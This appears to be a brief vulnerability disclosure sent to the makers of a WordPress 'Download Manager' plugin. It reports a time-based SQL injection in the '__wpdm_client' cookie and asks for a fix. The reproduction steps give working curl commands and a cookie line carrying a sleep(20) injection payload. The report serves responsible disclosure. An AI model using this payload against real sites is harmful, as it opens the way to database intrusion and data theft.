I would like to ask you about how to inform vulnerability issue for Download Manager.
Also request to do some countermeasure for this issue.
Issue: A SQL injection attack on the cookie “__wpdm_client” will result in unintended behavior.
Operation:
STEP 1: Run “curl” command as follow.
curl -i -c C:\Cookie\Cookie.txt http://[site address]/download/[File name]/?wpdmdl=[File number]
STEP 2: Open “C:\Cookie\Cookie.txt” and add as below comments with red color.
#HttpOnly_localhost FALSE /download/XXXX/ FALSE 0 __wpdm_client abcdefghijklmn’%2b(select*from(select(sleep(20)))a)%2b’
STEP 3: Run “curl” command as follow
curl -i -b C:\Cookie\Cookie.txt http://[Site addres]/download/[File name]/?wpdmdl=[File number]
STEP 4: To show the file, have to wait 20 seconds.
I am looking forward to your feedback.
Best regards,
.
